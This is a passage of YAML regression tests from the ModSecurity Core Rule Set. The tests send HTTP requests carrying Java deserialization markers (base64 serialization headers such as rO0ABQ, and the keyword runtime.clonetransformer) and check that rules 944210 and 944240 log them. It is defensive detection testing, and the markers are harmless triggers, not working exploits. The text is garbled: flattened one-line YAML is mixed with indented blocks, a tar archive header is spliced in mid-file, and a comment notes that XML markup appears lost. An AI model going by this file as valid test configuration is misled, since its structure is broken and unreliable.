Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"rO0ABQ\"}" output: log_contains: "id \"944210\"" - test_title: 944210-12 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
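"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"rO0ABQ\": \"test\"}" output: log_contains: "id \"944210\""
  # 944210-13: multipart/form-data request with one part ("payload", declared
  # as application/json) that carries the keyword rO0ABQ as a JSON member NAME.
  # rO0ABQ is how the Java serialization header 0xAC 0xED 0x00 0x05 starts
  # when base64-encoded. Rule 944210 must be logged.
  - test_title: 944210-13
    desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            # The delimiter lines are the header's boundary prefixed with "--";
            # the blank line separates the part headers from the part body.
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"rO0ABQ": "test"}
              -----------------------------thisissparta--
          output:
            log_contains: "id \"944210\""
  # 944210-14: same request shape, but the keyword sits in the JSON member
  # VALUE, as the desc states, so this case is not a duplicate of 944210-13
  # and the "arg value" position is really exercised.
  - test_title: 944210-14
    desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"test": "rO0ABQ"}
              -----------------------------thisissparta--
          output:
            log_contains: "id \"944210\""
- test_title: 944210-15 desc: "Content-Type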
multipart/form-data XML element value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml rO0ABQ -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml rO0ABQ -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-17 desc: "Argument test includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=KztAAU" output: log_contains: "id \"944210\"" - test_title: 944210-18 desc: "Argument name includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "KztAAU=test" output: log_contains: "id \"944210\"" - test_title: 944210-19 desc: "Cookie test includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=KztAAU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-20 desc: "Cookie name includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: KztAAU=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-21 desc: "Request header test includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" 
User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: KztAAU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-22 desc: "XML element includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944210\"" - test_title: 944210-23 desc: "XML attribute name includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944210\"" - test_title: 944210-24 desc: "XML attribute value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: 
"element_value" output: log_contains: "id \"944210\"" - test_title: 944210-25 desc: "XML element value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "KztAAU" output: log_contains: "id \"944210\"" - test_title: 944210-26 desc: "Nested XML element value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "KztAAU" output: log_contains: "id \"944210\"" - test_title: 944210-27 desc: "Content-Type text/plain includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=KztAAU" output: log_contains: "id \"944210\"" - test_title: 944210-28 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
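"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"KztAAU\"}" output: log_contains: "id \"944210\""
  # 944210-29: application/json body with the keyword KztAAU as a member NAME.
  # Rule 944210 must be logged.
  - test_title: 944210-29
    desc: "Content-Type application/json arg name includes keyword KztAAU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"KztAAU\": \"test\"}"
          output:
            log_contains: "id \"944210\""
  # 944210-30: multipart/form-data request with one part ("payload", declared
  # as application/json) that carries the keyword as a JSON member NAME.
  - test_title: 944210-30
    desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            # The delimiter lines are the header's boundary prefixed with "--";
            # the blank line separates the part headers from the part body.
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"KztAAU": "test"}
              -----------------------------thisissparta--
          output:
            log_contains: "id \"944210\""
  # 944210-31: same request shape, but the keyword sits in the JSON member
  # VALUE, as the desc states, and the JSON is well-formed. This keeps the
  # case distinct from 944210-30 and really exercises the "arg value" position.
  - test_title: 944210-31
    desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/json

              {"test": "KztAAU"}
              -----------------------------thisissparta--
          output:
            log_contains: "id \"944210\""
  # 944210-32: multipart/form-data request whose part is declared as
  # application/xml.
  # NOTE(review): the desc speaks of an XML element value, but no XML markup is
  # visible around the keyword in this copy of the payload - it may have been
  # lost in extraction; confirm against upstream before relying on this case.
  - test_title: 944210-32
    desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
            method: "POST"
            version: "HTTP/1.0"
            data: |
              -----------------------------thisissparta
              Content-Disposition: form-data; name="payload"
              Content-Type: application/xml

              KztAAU
              -----------------------------thisissparta--
          output:
            log_contains: "id \"944210\""
- test_title: 944210-33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta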
Content-Disposition: form-data; name="payload" Content-Type: application/xml KztAAU -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-34 desc: "Argument test includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Cs7QAF" output: log_contains: "id \"944210\"" - test_title: 944210-35 desc: "Argument name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Cs7QAF=test" output: log_contains: "id \"944210\"" - test_title: 944210-36 desc: "Cookie test includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Cs7QAF method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-37 desc: "Cookie name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: 
"localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Cs7QAF=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-38 desc: "Request header test includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Cs7QAF method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944210\"" - test_title: 944210-39 desc: "XML element includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "value" output: no_log_contains: "id \"944210\"" - test_title: 944210-40 desc: "XML attribute name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: no_log_contains: "id \"944210\"" - test_title: 944210-41 desc: "XML attribute value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944210\"" - test_title: 944210-42 desc: "XML element value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Cs7QAF" output: log_contains: "id \"944210\"" - test_title: 944210-43 desc: "Nested XML element value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Cs7QAF" output: log_contains: "id \"944210\"" - test_title: 944210-44 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Cs7QAF" output: log_contains: "id \"944210\"" - test_title: 944210-45 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Cs7QAF\"}" output: log_contains: "id \"944210\"" - test_title: 944210-46 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Cs7QAF\": \"test\"}" output: log_contains: "id \"944210\"" - test_title: 944210-47 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"Cs7QAF": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-48 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"Cs7QAF": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-49 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml Cs7QAF -----------------------------thisissparta-- output: log_contains: "id \"944210\"" - test_title: 944210-50 desc: "Content-Type multipart/form-data XML element value includes 
keyword Cs7QAF" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml Cs7QAF -----------------------------thisissparta-- output: log_contains: "id \"944210\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml��������0000664�0000000�0000000�00000222300�14461225151�0027667�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944240.yaml" description: "Positive tests for rule 944240" tests: - test_title: 944240-0 desc: "Argument test includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" 
data: "test=runtime.clonetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-1 desc: "Argument name includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.clonetransformer=test" output: log_contains: "id \"944240\"" - test_title: 944240-2 desc: "Cookie test includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.clonetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-3 desc: "Cookie name includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.clonetransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-4 desc: "Request header test includes keyword runtime.clonetransformer" stages: - 
